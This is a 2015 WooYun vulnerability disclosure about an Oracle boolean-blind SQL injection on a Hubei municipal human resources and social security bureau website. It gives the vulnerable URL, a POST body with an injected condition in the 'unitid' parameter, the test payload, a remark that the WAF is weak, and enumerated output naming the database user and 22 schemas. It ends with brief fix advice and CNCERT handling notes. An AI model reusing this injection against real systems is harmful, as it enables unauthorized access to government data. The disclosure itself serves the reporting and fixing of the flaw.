漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2015-0115008
漏洞标题:湖北某市人力资源和社会保障局sql注入(dba)
相关厂商:湖北某市人力资源和社会保障局
漏洞作者: 大懒
提交时间:2015-05-21 11:26
修复时间:2015-07-10 10:38
公开时间:2015-07-10 10:38
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:12
漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2015-05-21: 细节已通知厂商并且等待厂商处理中
2015-05-26: 厂商已经确认,细节仅向厂商公开
2015-06-05: 细节向核心白帽子及相关领域专家公开
2015-06-15: 细节向普通白帽子公开
2015-06-25: 细节向实习白帽子公开
2015-07-10: 细节向公众公开
简要描述:
湖北某市人力资源和社会保障局oracle注入,高权限
详细说明:
URL:http://www.hbychrss.gov.cn/module/jslib/jquery/jpage/morecolumndataproxy.jsp?endrecord=9&perpage=3&startrecord=1
POST参数:appid=1&columnid=23246%2C24905%2C24906%2C24907%2C24909%2C24910%2C24923%2C24911%2C24912%2C24913%2C24914%2C24915%2C24916%2C24917%2C24918%2C24919%2C24920%2C24921%2C24922%2C24924*&keyWordCount=30&path=%2F&unitid=30352%20AND%203*2*1%3d6%20AND%20991%3d991&webid=18&webname=%E5%AE%9C%E6%98%8C%E4%BA%BA%E5%8A%9B%E8%B5%84%E6%BA%90%E5%92%8C%E7%A4%BE%E4%BC%9A%E4%BF%9D%E9%9A%9C%E5%B1%80
存在问题参数:unitid
payload:and 1=1
oracle的布尔盲注,有waf,不过waf不给力,不知道是因为规则有触发还是规则很老了,
current user: 'JCMS243'
available databases [22]:
[*] BSZY
[*] CTXSYS
[*] DBSNMP
[*] DMSYS
[*] EXFSYS
[*] GOV
[*] JCMS243
[*] JPHOTO
[*] JSEARCH
[*] LDAP
[*] MDSYS
[*] OLAPSYS
[*] ORDSYS
[*] OUTLN
[*] SCOTT
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] TSMSYS
[*] VIPCHAT
[*] WMSYS
[*] XDB
漏洞证明:
修复方案:
让waf厂商给你们升级规则库,提供服务!
过滤关键字特殊符号
版权声明:转载请注明来源 大懒@乌云
漏洞回应
厂商回应:
危害等级:中
漏洞Rank:10
确认时间:2015-05-26 10:38
厂商回复:
CNVD确认并复现所述情况,已经转由CNCERT下发给湖北分中心,由其后续协调网站管理单位处置。
最新状态:
暂无